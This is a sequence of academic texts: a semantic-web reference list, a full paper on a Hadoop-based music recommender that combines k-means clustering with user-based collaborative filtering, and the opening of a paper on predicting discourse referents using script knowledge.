Kuhn T, Dumontier M. 2017. Genuine semantic publishing. Data Science 1(1–2):139–154 DOI 10.3233/DS-170010.
Kuhn T, Willighagen E, Evelo C, Queralt-Rosinach N, Centeno E, Furlong LI. 2017. Reliable granular references to changing linked data. In: International Semantic Web Conference. Springer DOI 10.1007/978-3-319-68288-4_26.
Lanthaler M, Gütl C. 2013. Hydra: A vocabulary for hypermedia-driven web APIs. In: LDOW2013. Rio de Janeiro, Brazil, 996.
Lisena P, Meroño-Peñuela A, Kuhn T, Troncy R. 2019. Easy web API development with SPARQL transformer. In: International Semantic Web Conference. Cham: Springer DOI 10.1007/978-3-030-30796-7_28.
Mansour E, Sambra AV, Hawke S, Zereba M, Capadisli S, Ghanem A, Aboulnaga A, Berners-Lee T. 2016. A demonstration of the Solid platform for social web applications. In: 25th International Conference Companion on World Wide Web. Montréal, Québec, Canada, 223–226 DOI 10.1145/2872518.2890529.
Meroño-Peñuela A, Hoekstra R. 2016. grlc makes GitHub taste like Linked Data APIs. In: European Semantic Web Conference. Springer DOI 10.1007/978-3-319-47602-5_48.
Minier T, Skaf-Molli H, Molli P, Vidal M-E. 2018. Intelligent clients for replicated triple pattern fragments. In: European Semantic Web Conference. Cham: Springer DOI 10.1007/978-3-319-93417-4_26.
Mons B, Van Haagen H, Chichester C, Den Dunnen JT, Van Ommen G, Van Mulligen E, Singh B, Hooft R, Roos M, Hammond J, Kiesel B, Giardine B, Velterop J, Groth P, Schultes E. 2011. The value of data. Nature Genetics 43(4):281–283 DOI 10.1038/ng0411-281.
Schmachtenberg M, Bizer C, Paulheim H. 2014. Adoption of the linked data best practices in different topical domains. In: International Semantic Web Conference. Cham: Springer, 245–260 DOI 10.1007/978-3-319-11964-9_16.
Shotton D. 2009. Semantic publishing: the coming revolution in scientific journal publishing. Learned Publishing 22(2):85–94 DOI 10.1087/2009202.
Speicher S, Arwe J, Malhotra A. 2015. Linked Data Platform 1.0. W3C Recommendation. Available at https://www.w3.org/TR/ldp/ (accessed 26 February 2015).
Taelman R, Steyskal S, Kirrane S. 2020. Towards querying in decentralized environments with privacy-preserving aggregation. In: Proceedings of the 4th Workshop on Storing, Querying, and Benchmarking the Web of Data.
Taelman R, Van Herwegen J, Vander Sande M, Verborgh R. 2018. Comunica: a modular SPARQL query engine for the web. In: 17th International Semantic Web Conference DOI 10.1007/978-3-030-00668-6_15.
Third A, Domingue J. 2017. Linkchains: exploring the space of decentralised trustworthy linked data. In: Workshop on Decentralizing the Semantic Web 2017. CEUR-WS.
Verborgh R, Vander Sande M, Hartig O, Van Herwegen J, De Vocht L, De Meester B, Haesendonck G, Colpaert P. 2016. Triple Pattern Fragments: a low-cost knowledge graph interface for the Web. Journal of Web Semantics 37–38:184–206 DOI 10.1016/j.websem.2016.03.003.
Vrandečić D, Krötzsch M. 2014. Wikidata: a free collaborative knowledgebase. Communications of the ACM 57(10):78–85 DOI 10.1145/2629489.
Werbrouck J, Taelman R, Verborgh R, Pauwels P, Beetz J, Mannens E. 2020. Pattern-based access control in a decentralised collaboration environment. In: Proceedings of the 8th Linked Data in Architecture and Construction Workshop. CEUR-WS.
work_2dimm6xerfcsnc7w5ji6qhdb7y ----

2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018)

Design and Implementation of Music Recommendation System Based on Hadoop

Zhao Yufeng
School of Computer Science and Engineering, Xi'an University of Technology, Shaanxi, Xi'an, China
e-mail: zyfzy99@163.com

Li Xinwei
School of Computer Science and Engineering, Xi'an University of Technology, Shaanxi, Xi'an, China
e-mail: 604013466@qq.com

Abstract—To address the information overload that music services face against a big-data background, this paper studies the design of a distributed music recommendation system based on Hadoop. The proposed algorithm is built on the MapReduce distributed computing framework, which offers high scalability and performance and can be applied efficiently to the computation and analysis of offline data. The music recommendation system designed in this paper also includes a client, a server interface, a database and ETL operations, forming a complete recommendation pipeline from the user-facing client through the server to the data computation.
To improve the accuracy of the recommendation algorithm, this paper introduces the k-means clustering algorithm to enhance user-based collaborative filtering. The experimental results show that the accuracy of the proposed algorithm improves significantly after the introduction of k-means.

Keywords-Music Recommendation; K-means Clustering; Collaborative Filtering; Recommendation Algorithm; Hadoop

I. INTRODUCTION

With the development of the mobile Internet, the amount of data generated by mobile apps has increased rapidly in recent years. On July 27, 2017, Trustdata, a well-known mobile big-data monitoring platform in China, released the "Analysis Report of China Mobile Internet Development in the First Half of 2017" [1]. According to the report, mobile music is a high-frequency application whose user numbers grew steadily in the first half of 2017, with a peak DAU (daily active users) of nearly 150 million. Taking NetEase Cloud Music as an example, since its client app was launched in April 2013 it has reached 300 million users and 400 million song lists. Such a huge amount of data makes traditional single-server storage and processing increasingly inadequate. Moreover, it is more and more difficult for users to find the songs they like in such a mass of data: only a few songs are true favorites, and finding them one by one is very laborious. In the past, when users wanted to listen to certain songs they searched for them with a search engine, but this only finds songs they already know; many songs that users do not know, but would probably like very much, are never heard. If a system pushes suitable songs to users directly, users spend less time searching and their stickiness to the system increases. For these reasons, this paper uses Hadoop, a big-data computing and storage framework, to store and process the data, solving the song-discovery problem and also improving user activity and stickiness.

The Hadoop-based recommendation system used in this paper has the following important implications in today's Internet context:
1) It effectively alleviates "information overload" by exploring the relationship between users and songs and providing users with content of interest;
2) Hadoop's parallel computing and distributed storage have good scalability and can effectively handle massive data storage and computation;
3) For the enterprise, a system with recommendation functionality enhances the user experience and increases user activity and stickiness.

II. ALGORITHM BASIS

A. Traditional user-based collaborative filtering recommendation algorithm

The traditional user-based collaborative filtering algorithm finds the users whose interests are most similar to those of the target user and then recommends songs that the target user has not yet heard but these similar users have. Specifically, a user-similarity measure is used to find the most similar users for each user; the listening records of these similar users are aggregated, the songs the target user has not heard are extracted from them, and each such song is scored according to the similarities of the users who listened to it; the songs are then ranked by this score and recommended to the target user [2]. The algorithm proceeds as follows:
1) Construct the user-song matrix.
Each row vector represents a user and each column a song. A matrix entry indicates whether the user has heard the song: 0 means not heard and 1 means heard, so it is a 0-1 matrix.
2) Generate the nearest-neighbor set. Based on the user-song matrix, a similarity measure is used to compute the similarity between users and thus find the set of users closest to the target user. Formula (1) [2] computes the similarity of two users:

w_{uv} = \frac{\sum_{i \in N(u) \cap N(v)} \frac{1}{\log(1 + |N(i)|)}}{\sqrt{|N(u)| \, |N(v)|}}    (1)

where N(u) denotes the set of songs user u has listened to and N(i) the set of users who have listened to song i.
3) Produce recommendations. The recommendation value of a song that a similar user has heard but the target user has not is determined by that user's similarity to the target user. When several similar users have heard the same song, its recommendation value is the sum of their similarities. Songs not yet heard by the target user are then sorted by recommendation value, and songs with high values are pushed to the target user first. Formula (2) [2] computes user u's predicted preference for song i:

p(u, i) = \sum_{v \in S(u,K) \cap N(i)} w_{uv} \, r_{vi}    (2)

where S(u, K) is the set of the K users most similar to u and r_{vi} is user v's rating of song i (1 in the 0-1 matrix).

B. Introducing the k-means algorithm to optimize the traditional recommendation algorithm

Clustering is an unsupervised learning method that groups data with similar attributes without manual labeling: data within the same group are similar to each other, while data in different groups differ. The improved collaborative filtering algorithm in this paper operates on groups of highly similar users, which gives it a better recommendation effect; the similarity computation therefore directly determines the clustering quality and, in turn, the final recommendation result. The principle is as follows. Suppose there is a set of m users, denoted U = (U1, U2, U3, ..., Um), where each user Ux has n attributes, denoted Cx = (Cx1, Cx2, Cx3, ..., Cxn); clustering compares the users attribute by attribute over the set U and divides them into groups of similar users [3]. The core idea of k-means is to divide the users into k groups: each group has a cluster center, the distance of every data point to each center is computed, and the point is assigned to the group whose center is nearest.

C. Improvements to the k-means clustering algorithm

1) Removal of free points [3]. Among all data points, free points are those far away from all other points; their presence shifts the center of the cluster they are assigned to and degrades the clustering. Free points are removed as follows. Let the total number of users be m; the number of user pairs (paths between users) is given by formula (3):

L = \frac{m(m-1)}{2}    (3)

The total distance over all user pairs is then:

D = \frac{1}{2} \sum_{i=1}^{m} \sum_{j \neq i} gap(C_i, C_j)    (4)

gap(C_i, C_j) = (C_{i1} - C_{j1})^2 + (C_{i2} - C_{j2})^2 + \cdots + (C_{in} - C_{jn})^2    (5)

In formula (5), C_{i1}, C_{j1}, ..., C_{in}, C_{jn} are the n attributes of users C_i and C_j.
The average distance is obtained from L and D by formula (6):

EMV = \frac{D}{L}    (6)

EMV is the average of all pairwise user distances. For each user U_i, compute its distance L_u = gap(U_i, U_j) to every other user U_j. If all of these distances satisfy L_u >= EMV, the user is classified as a free point and placed in a separate category. Because the free points are few, they cannot form a useful category for collaborative filtering on their own, so each free point is finally assigned to the cluster whose center is nearest to it.

2) The random selection of initial centers also affects the clustering result and can trap the algorithm in a local optimum. To address this, this paper adopts an improved clustering scheme: bisecting (dichotomous) k-means [4]. The idea is to first treat all points as one cluster and split it in two (k-means with k = 2), and then repeatedly select the cluster whose split most reduces the clustering cost function and split it in two again, until the number of clusters equals k. The cluster cost function is defined as the within-cluster sum of squared errors, as shown in formula (7); the cluster with the largest squared-error sum, whose points lie farthest from their center, is the one that is split again.

E_i = \sum_{p \in C_i} \| p - c_i \|^2    (7)

where C_i is the i-th cluster and c_i its center.

III. RECOMMENDATION SYSTEM DESIGN

This section describes the implementation and testing of the entire system and the frameworks behind each of its features. It first introduces the top-level design, then analyzes the overall framework of the system, the technologies required and the overall process, and finally evaluates the recommendation results in terms of precision and recall.

A. Recommendation process

The k-means-clustering-based collaborative filtering algorithm proposed in the previous section consists of two main stages: first, k-means is used to cluster the users; second, user-based collaborative filtering is run to generate the recommendation results.

Figure 1. Distributed recommendation algorithm flow (user song records and common song tags feed user clustering, followed by collaborative filtering, user similarity computation and generation of the recommendation results)

The parallelized flow of the algorithm is shown in Figure 1. The clustering stage consists of three steps. The first step creates the user-tag model: a MapReduce job combines the user log table with the list of common song tags, using the tag file as a cache file; for every song in a user's listening record, the counts at the corresponding positions of the user's tag vector are incremented, producing a user-tag matrix. The second step uses the k-means algorithm to compute the cluster centers of the user-tag matrix; after several iterations, a relatively stable center for each cluster is obtained. The third step reads the center-point file as a cache and classifies the users by computing which center each user is closest to and placing the user in that cluster. User-based collaborative filtering then produces recommendations for the users within each cluster. This stage is itself divided into several steps, including counting how often each song has been listened to, counting how many songs each user has listened to, computing user similarities, and generating the recommendation results.
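The following is a minimal single-machine sketch of the core computations described above: the free-point filter of formulas (3)-(6) and the user-based collaborative filtering of formulas (1)-(2). It only illustrates the logic that the MapReduce jobs of Section IV parallelize; the in-memory data layout, the function names and the use of squared coordinate differences as the distance are assumptions made for the sketch.

import math
from collections import defaultdict
from itertools import combinations

def remove_free_points(vectors):
    # Free-point filter, formulas (3)-(6).  vectors: dict user -> tag-count vector.
    users = list(vectors)
    pairs = len(users) * (len(users) - 1) / 2           # L, formula (3)
    def gap(a, b):                                      # formula (5); squared
        return sum((x - y) ** 2 for x, y in zip(a, b))  # differences are assumed
    total = sum(gap(vectors[u], vectors[v])
                for u, v in combinations(users, 2))     # D, formula (4)
    emv = total / pairs                                 # formula (6)
    free = [u for u in users
            if all(gap(vectors[u], vectors[v]) >= emv for v in users if v != u)]
    return [u for u in users if u not in free], free

def user_similarity(listened):
    # Formula (1).  listened: dict user -> set of song ids.  Co-listened songs
    # are down-weighted by popularity, then normalised by sqrt(|N(u)||N(v)|).
    song_users = defaultdict(set)
    for u, songs in listened.items():
        for s in songs:
            song_users[s].add(u)
    acc = defaultdict(float)
    for s, us in song_users.items():
        w = 1.0 / math.log(1 + len(us))
        for u, v in combinations(sorted(us), 2):
            acc[(u, v)] += w
    sim = defaultdict(dict)
    for (u, v), c in acc.items():
        value = c / math.sqrt(len(listened[u]) * len(listened[v]))
        sim[u][v] = sim[v][u] = value
    return sim

def recommend(u, listened, sim, k=10, top_n=5):
    # Formula (2): score unheard songs by the summed similarity of the K most
    # similar users who listened to them (r_vi = 1 in the 0-1 matrix).
    scores = defaultdict(float)
    neighbours = sorted(sim.get(u, {}).items(), key=lambda x: -x[1])[:k]
    for v, w_uv in neighbours:
        for song in listened[v] - listened[u]:
            scores[song] += w_uv
    return sorted(scores.items(), key=lambda x: -x[1])[:top_n]

In the full system, remove_free_points and the k-means step are applied to the user-tag matrix first, and user_similarity and recommend are then run inside each resulting cluster.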
B. Recommendation system architecture design

The recommendation system is divided into a recommendation algorithm layer, a server side and a client. The algorithm layer uses a Hadoop cluster for distributed recommendation, the server side is developed with Java Servlets and a MySQL database, and the client side uses Android for display [5]. Log collection is performed with the ETL tool Sqoop. The overall framework is shown in Figure 2. As the figure shows, the system consists of four major parts: the top-level client, the server, the database and the Hadoop layer. The client uses the Android system for display, the server is developed with Java EE, and the database is MySQL. MySQL is the intermediate data link between the client and the recommendation system: data is stored in the database so that the front-end server and Hadoop are decoupled. Data transfer between the database and Hadoop is handled by Sqoop, a Hadoop-based tool for bulk data transfer between relational databases and HDFS; it requires Hadoop to run and also speeds up the transfer. The collected data is stored in HDFS. The Hadoop layer has two parts: HDFS for data storage and MapReduce for distributed computation. MapReduce reads the data from HDFS, performs the computation, and writes the results back to HDFS. Sqoop then reads the results from HDFS and transfers them to MySQL; the client requests the server at irregular intervals, the server reads data from the database and returns it to the client, and the user's operations on songs are fed back to the server and saved to the database [6].

Figure 2. Recommendation system architecture (Android client, web service, MySQL, Sqoop, HDFS and MapReduce)

C. Recommendation system function module analysis

Since the system recommends different songs to different users, users must log in with their own user names, so the system must also provide user registration. To listen to different songs, users must be able to search for songs and add tags to them. Because the system does not actually play songs, it also needs a collection or favorites feature [7]. The server side provides interfaces for these requirements, and the database contains corresponding tables to store the content. The resulting function diagram of the system is shown in Figure 3. The system functionality is decomposed into four modules. The client offers user registration, login, song search, song tagging and play; "play" actually refers to collecting or liking a song, since copyright issues prevent real playback. These functions correspond to server-side interfaces that provide the data. The data is read from the database, which is designed with three tables: a user table used for registration and login; a table recording users' listening to songs, which holds the largest amount of data; and a song table storing each song's basic information, including tag information, to support searching songs and adding tags [8]. An illustrative schema for these tables is sketched after Figure 3.

Figure 3. Recommendation system function block diagram (client functions: register, login, search, add tag, play; server interfaces: registration, login, search, add; MySQL tables: user table, listening record table, song list; Hadoop: k-means clustering and collaborative filtering; Sqoop for transfer)
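As a concrete illustration of the three tables just described, the sketch below creates them with SQLite (the deployed system uses MySQL; SQLite merely keeps the example self-contained and runnable). All column names are assumptions, since the paper does not list the exact fields.

import sqlite3

conn = sqlite3.connect(":memory:")   # stand-in for the MySQL instance
conn.executescript("""
CREATE TABLE user (                       -- registration and login
    user_id     INTEGER PRIMARY KEY,
    username    TEXT UNIQUE NOT NULL,
    password    TEXT NOT NULL
);
CREATE TABLE song (                       -- basic song information, incl. tags
    song_id     INTEGER PRIMARY KEY,
    title       TEXT NOT NULL,
    tags        TEXT                      -- comma-separated tag list
);
CREATE TABLE listen_record (              -- largest table: one row per play/favorite
    user_id     INTEGER REFERENCES user(user_id),
    song_id     INTEGER REFERENCES song(song_id),
    listened_at TEXT                      -- timestamp of the interaction
);
""")
conn.execute("INSERT INTO user (username, password) VALUES (?, ?)", ("demo_user", "secret"))
conn.commit()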
IV. DESIGN OF THE HADOOP-BASED RECOMMENDATION SYSTEM

The parallelization is based on the k-means clustering algorithm introduced in the previous section and on the user-based collaborative filtering algorithm, both implemented on the distributed system. The distributed recommendation algorithm is divided into two modules, a distributed k-means clustering algorithm and a distributed collaborative filtering algorithm, which are finally connected to form the complete distributed recommendation workflow [9].

A. Parallel design of k-means clustering

The input of the k-means algorithm is a matrix; since users are being clustered, a user-tag matrix is first formed by data preprocessing. The user listening records are large files and must be processed in parallel. The listening records are loaded into HDFS and each record is extended with the song's tag, producing records of the form (user id, song id, listening time, tag). A single MapReduce step then builds the user-tag matrix in parallel, and the matrix is clustered. The parallel clustering algorithm is designed as follows: the first step scans all original points and randomly selects k points as the initial cluster centers; the second step computes the distance of every point to each center and assigns each point to the cluster of its closest center; the third step repeats the second step until the termination condition is met [10]; the fourth step processes all user points and assigns each user to its cluster. The architecture of the algorithm is shown in Figure 4.

Figure 4. Distributed k-means clustering algorithm architecture (data sources userlog.txt and songtags.txt in HDFS; MapReduce jobs: UTMatrixMapper/UTMatrixReduce build the user-tag matrix, KMeansMapper/KMeansCombiner/KMeansReducer with KMeansDriver iterate the cluster centers, and KMeansClusterMapper assigns users to clusters)

B. Parallel design of the user-based collaborative filtering recommendation algorithm

Following formulas (1) and (2) in the first section and the rules of Hadoop distributed design, the recommendation algorithm is organized into the following steps: the first step counts how many songs each user listens to; the second step counts the number of times each song is heard; the third step computes the similarity of every pair of users, where only pairs of users who have heard at least one common song need to be computed; the fourth step computes each user's recommendation value for each song to form a recommendation list; the final step sums the recommendation values a user has for the same song. These steps are implemented with MapReduce, and the complete workflow requires several map and reduce phases. Figure 5 shows the MapReduce architecture of the user-based collaborative filtering algorithm; a streaming-style sketch of one of the counting steps follows the figure caption.

Figure 5. Distributed architecture based on the user collaborative filtering algorithm (MapReduce jobs: UserListenCountMapper/Reduce, SongListenedCountMapper/Reduce, UserSimilarityMapper/Reduce, UserCommendSimMapper, UserCommendLogMapper, UserCommendReducer and UserSongValueMapper/Reducer, producing the user-song interest values and the final recommendation results from userlog.txt in HDFS)
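To make the MapReduce design concrete, the sketch below reformulates one step, counting how many times each song has been listened to, in Hadoop Streaming style with Python. The paper's own jobs are Java MapReduce classes (e.g., SongListenedCountMapper/Reduce in Figure 5); the record layout (user id, song id, listening time, tag) follows Section IV-A, while tab-separated fields and the exact command line are assumptions of this sketch.

#!/usr/bin/env python3
# Hadoop Streaming sketch of the "times each song was listened to" step.
# Typical invocation (assumed): hadoop jar hadoop-streaming.jar -input userlog.txt
#   -output counts -mapper "count_listens.py map" -reducer "count_listens.py reduce"
import sys
from itertools import groupby

def run_mapper(stream):
    for line in stream:
        fields = line.rstrip("\n").split("\t")     # (user id, song id, time, tag)
        if len(fields) >= 2:
            print(f"{fields[1]}\t1")               # key = song id, value = 1

def run_reducer(stream):
    # Hadoop sorts mapper output by key, so equal song ids arrive grouped.
    pairs = (line.rstrip("\n").split("\t") for line in stream)
    for song_id, group in groupby(pairs, key=lambda kv: kv[0]):
        print(f"{song_id}\t{sum(int(v) for _, v in group)}")

if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "reduce":
        run_reducer(sys.stdin)
    else:
        run_mapper(sys.stdin)

The other counting and similarity steps follow the same key-value pattern, with the pairwise similarity job emitting (user pair, partial weight) records that a reducer sums into formula (1).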
V. EXPERIMENTS AND EVALUATION

On the same data set, repeated experiments were run on the traditional user-based collaborative filtering algorithm, the recommendation algorithm with K-means clustering, and the recommendation algorithm with the improved clustering, and stable results were selected for analysis [11].

A. Experimental environment and data set

The environment comprises the Hadoop cluster, Sqoop, the development environment and the web server. The cluster is built with VMware virtual machines and uses three nodes, one master and two slaves.
• Host configuration, hardware environment: CPU Intel i5-4590, quad-core, 3.30 GHz; RAM 8 GB;
• Software environment: OS CentOS 7, Java environment JDK 1.8, server Tomcat 8.0, Hadoop 2.7.4;
• Development environment: Eclipse, Windows 10, Hadoop plugin;
• Music data used in this experiment come from the network and include more than 50,000 users, more than 1,700,000 user operations, and 730 tags.

B. Results display

Figure 6 shows a screenshot of the recommendation results on an Android phone.

Figure 6. Android mobile music recommendation results

C. Evaluation indices

Precision and recall [12] are used as evaluation indices. Each user's song records are sorted by date in descending order, with the top 80% used as the training set and the remaining 20% as the test set for the evaluation.

Precision = (number of correct recommendations / number of recommendations) × 100%    (8)

Recall = (number of correct recommendations / number of songs the user likes) × 100%    (9)

Formulas (8) and (9) define precision and recall, respectively; a small helper that computes them is shown at the end of this section.

D. Line charts comparing the three algorithms

After repeated experiments, the change of precision with the K value for the three algorithms is shown in the line chart of Figure 7. As Figure 7 shows, the precision after introducing the K-means clustering algorithm is better than that of the traditional collaborative filtering algorithm; when K is 4 the precision increases by about 0.65%, which is the best classification. After the clustering algorithm is improved, the precision is nearly 0.15% higher than the unimproved version when K is 5.

Figure 8 shows the change of recall for the three algorithms. The recall of the K-means clustering algorithm is better than that of the traditional collaborative filtering algorithm, and when K is 4 the recall increases by about 0.65%. When K is 5, the recall increases by nearly 0.15% after the clustering algorithm is improved; but as K increases further, the improved clustering falls below the unimproved clustering algorithm. Since the number of users is fixed, removing the free points affects every cluster; some clusters end up with very few users, their recommendations become inaccurate, and the overall effect of the recommendation algorithm suffers.

Figure 7. The change of precision with K value

Figure 8. The change of recall with K value
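Formulas (8) and (9) can be computed directly from a recommendation list and the held-out test listens; the following minimal helper (names are illustrative) shows the calculation.

def precision_recall(recommended, liked):
    # Formulas (8) and (9): precision and recall of one user's recommendation
    # list, both expressed as percentages.
    recommended, liked = set(recommended), set(liked)
    hits = len(recommended & liked)
    precision = 100.0 * hits / len(recommended) if recommended else 0.0
    recall = 100.0 * hits / len(liked) if liked else 0.0
    return precision, recall

# Example: 2 of 5 recommended songs appear in the user's held-out test listens.
print(precision_recall(["s1", "s2", "s3", "s4", "s5"], ["s2", "s4", "s9", "s10"]))
# -> (40.0, 50.0)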
VI. CONCLUDING REMARKS

This paper presents the design and implementation of a Hadoop-based music recommendation system and improves the traditional user-based collaborative filtering algorithm, raising its precision by clustering users with song tags. Hadoop, a scalable and high-performance distributed computing platform, provides a reference for the design of a music recommendation system against a big-data background. The k-means clustering and collaborative filtering recommendation algorithm is designed on the MapReduce distributed framework, which offers some reference value for the distributed design of recommendation algorithms.

REFERENCES
[1] Trustdata. China Mobile Internet Development Analysis Report for the First Half of 2017 [EB/OL]. (2017-07-30). http://itrustdata.com/#service
[2] Xiang Liang. Recommendation System Practice [M]. Beijing: People's Posts and Telecommunications Press, 2012: 1-3; Zhang Xin-sheng, Zhang Hai-ying, Mao Qian. Hadoop [EB/OL]. (2016-12-19). https://baike.baidu.com/item/Hadoop/3526507
[3] Wu Hongchen, Wang Xinjun, Cheng Yong, Peng Zhaohui. Advanced Recommendation Based on Collaborative Filtering and Partition Clustering [J]. Computer Research and Development, 2011, 48(S3): 205-212.
[4] Zheng Jie. Machine Learning Algorithm Principles and Programming Practice [M]. Beijing: Electronic Industry Press, 2015: 141.
[5] Weston J, Bengio S, Hamel P, et al. Large-Scale Music Annotation and Retrieval: Learning to Rank in Joint Semantic Spaces [J]. arXiv: Learning, 2011.
[6] Van den Oord A, Dieleman S, Schrauwen B. Deep content-based music recommendation [C]. Neural Information Processing Systems, 2013: 2643-2651.
[7] Su J, Chang W, Tseng V S, et al. Personalized Music Recommendation by Mining Social Media Tags [J]. Procedia Computer Science, 2013: 303-312.
[8] Davidson J, Liebald B, Liu J, et al. The YouTube video recommendation system [C]. Conference on Recommender Systems, 2010: 293-296.
[9] Feng Ya-li, Jiang Jie, Tian Feng. Research on the combined recommendation algorithm based on item and user [J]. Information Technology, 2017, (10): 69-73.
[10] Chang Xiao-yu, Yu Zheng-sheng. Point-of-interest Recommendation Algorithm Introducing Time Attenuation Item [J]. Journal of Hangzhou Dianzi University (Natural Sciences), 2016, 36(03): 42-46. DOI: 10.13954/j.cnki.hdu.2016.03.009
[11] Zhao Z, Shang M. User-Based Collaborative-Filtering Recommendation Algorithms on Hadoop [C]. Knowledge Discovery and Data Mining, 2010: 478-481.
[12] Chen Yaxi. Music recommendation system and related technologies [J]. Computer Engineering and Applications, 2012, 48(18): 9-16+47.

work_2dw3vuoprfdbdnrfirx5jj7jme ----

Modi, A., Titov, I., Demberg, V., Sayeed, A. & Pinkal, M. (2017). Modeling Semantic Expectation: Using Script Knowledge for Referent Prediction. Transactions of the Association for Computational Linguistics, 5, 31–44. https://www.transacl.org/ojs/index.php/tacl/article/view/968
Modeling Semantic Expectation: Using Script Knowledge for Referent Prediction

Ashutosh Modi 1,3   Ivan Titov 2,4   Vera Demberg 1,3   Asad Sayeed 1,3   Manfred Pinkal 1,3
1 {ashutosh,vera,asayeed,pinkal}@coli.uni-saarland.de   2 titov@uva.nl
3 Universität des Saarlandes, Germany   4 ILLC, University of Amsterdam, the Netherlands

Abstract

Recent research in psycholinguistics has provided increasing evidence that humans predict upcoming content. Prediction also affects perception and might be a key to robustness in human language processing. In this paper, we investigate the factors that affect human prediction by building a computational model that can predict upcoming discourse referents based on linguistic knowledge alone vs. linguistic knowledge jointly with common-sense knowledge in the form of scripts. We find that script knowledge significantly improves model estimates of human predictions. In a second study, we test the highly controversial hypothesis that predictability influences referring expression type but do not find evidence for such an effect.

1 Introduction

Being able to anticipate upcoming content is a core property of human language processing (Kutas et al., 2011; Kuperberg and Jaeger, 2016) that has received a lot of attention in the psycholinguistic literature in recent years. Expectations about upcoming words help humans comprehend language in noisy settings and deal with ungrammatical input. In this paper, we use a computational model to address the question of how different layers of knowledge (linguistic knowledge as well as common-sense knowledge) influence human anticipation.

Here we focus our attention on semantic predictions of discourse referents for upcoming noun phrases. This task is particularly interesting because it allows us to separate the semantic task of anticipating an intended referent and the processing of the actual surface form. For example, in the context of I ordered a medium sirloin steak with fries. Later, the waiter brought . . . , there is a strong expectation of a specific discourse referent, i.e., the referent introduced by the object NP of the preceding sentence, while the possible referring expression could be either the steak I had ordered, the steak, our food, or it. Existing models of human prediction are usually formulated using the information-theoretic concept of surprisal. In recent work, however, surprisal is usually not computed for DRs, which represent the relevant semantic unit, but for the surface form of the referring expressions, even though there is an increasing amount of literature suggesting that human expectations at different levels of representation have separable effects on prediction and, as a consequence, that the modelling of only one level (the linguistic surface form) is insufficient (Kuperberg and Jaeger, 2016; Kuperberg, 2016; Zarcone et al., 2016).
The present model addresses this shortcoming by explicitly modelling and representing common-sense knowledge and conceptually separating the semantic (discourse referent) and the surface level (referring expression) expectations.

Our discourse referent prediction task is related to the NLP task of coreference resolution, but it substantially differs from that task in the following ways: 1) we use only the incrementally available left context, while coreference resolution uses the full text; 2) coreference resolution tries to identify the DR for a given target NP in context, while we look at the expectations of DRs based only on the context before the target NP is seen.

The distinction between referent prediction and prediction of referring expressions also allows us to study a closely related question in natural language generation: the choice of a type of referring expression based on the predictability of the DR that is intended by the speaker. This part of our work is inspired by a referent guessing experiment by Tily and Piantadosi (2009), who showed that highly predictable referents were more likely to be realized with a pronoun than unpredictable referents, which were more likely to be realized using a full NP. The effect they observe is consistent with a Gricean point of view, or the principle of uniform information density (see Section 5.1). However, Tily and Piantadosi do not provide a computational model for estimating referent predictability. Also, they do not include selectional preference or common-sense knowledge effects in their analysis.

We believe that script knowledge, i.e., common-sense knowledge about everyday event sequences, represents a good starting point for modelling conversational anticipation. This type of common-sense knowledge includes temporal structure which is particularly relevant for anticipation in continuous language processing. Furthermore, our approach can build on progress that has been made in recent years in methods for acquiring large-scale script knowledge; see Section 1.1. Our hypothesis is that script knowledge may be a significant factor in human anticipation of discourse referents. Explicitly modelling this knowledge will thus allow us to produce more human-like predictions.

Script knowledge enables our model to generate anticipations about discourse referents that have already been mentioned in the text, as well as anticipations about textually new discourse referents which have been activated due to script knowledge. By modelling event sequences and event participants, our model captures many more long-range dependencies than normal language models are able to. As an example, consider the following two alternative text passages:

We got seated, and had to wait for 20 minutes. Then, the waiter brought the ...
We ordered, and had to wait for 20 minutes. Then, the waiter brought the ...

Preferred candidate referents for the object position of the waiter brought the ... are instances of the food, menu, or bill participant types. In the context of the alternative preceding sentences, there is a strong expectation of instances of a menu and a food participant, respectively.
This paper represents foundational research investigating human language processing. However, it also has the potential for application in assistant technology and embodied agents. The goal is to achieve human-level language comprehension in realistic settings, and in particular to achieve robustness in the face of errors or noise. Explicitly modelling expectations that are driven by common-sense knowledge is an important step in this direction.

In order to be able to investigate the influence of script knowledge on discourse referent expectations, we use a corpus that contains frequent reference to script knowledge, and provides annotations for coreference information, script events and participants (Section 2). In Section 3, we present a large-scale experiment for empirically assessing human expectations on upcoming referents, which allows us to quantify at what points in a text humans have very clear anticipations vs. when they do not. Our goal is to model human expectations, even if they turn out to be incorrect in a specific instance. The experiment was conducted via Mechanical Turk and follows the methodology of Tily and Piantadosi (2009). In Section 4, we describe our computational model that represents script knowledge. The model is trained on the gold standard annotations of the corpus, because we assume that human comprehenders usually will have an analysis of the preceding discourse which closely corresponds to the gold standard. We compare the prediction accuracy of this model to human predictions, as well as to two baseline models in Section 4.3. One of them uses only structural linguistic features for predicting referents; the other uses general script-independent selectional preference features. In Section 5, we test whether surprisal (as estimated from human guesses vs. computational models) can predict the type of referring expression used in the original texts in the corpus (pronoun vs. full referring expression). This experiment also has wider implications with respect to the on-going discussion of whether the referring expression choice is dependent on predictability, as predicted by the uniform information density hypothesis.

(I)(1)P bather [decided]E wash to take a (bath)(2)P bath yesterday afternoon after working out . Once (I)(1)P bather got back home , (I)(1)P bather [walked]E enter bathroom to (my)(1)P bather (bathroom)(3)P bathroom and first quickly scrubbed the (bathroom tub)(4)P bathtub by [turning on]E turn water on the (water)(5)P water and rinsing (it)(4)P bathtub clean with a rag . After (I)(1)P bather finished , (I)(1)P bather [plugged]E close drain the (tub)(4)P bathtub and began [filling]E fill water (it)(4)P bathtub with warm (water)(5)P water set at about 98 (degrees)(6)P temperature .

Figure 1: An excerpt from a story in the InScript corpus. The referring expressions are in parentheses, and the corresponding discourse referent label is given by the superscript. Referring expressions of the same discourse referent have the same color and superscript number. Script-relevant events are in square brackets and colored in orange. Event type is indicated by the corresponding subscript.

The contributions of this paper consist of:
• a large dataset of human expectations, in a variety of texts related to every-day activities.
• an implementation of the conceptual distinction between the semantic level of referent prediction and the type of a referring expression.
• a computational model which significantly improves modelling of human anticipations.
• showing that script knowledge is a significant factor in human expectations.
• testing the hypothesis of Tily and Piantadosi that the choice of the type of referring expression (pronoun or full NP) depends on the predictability of the referent.

1.1 Scripts

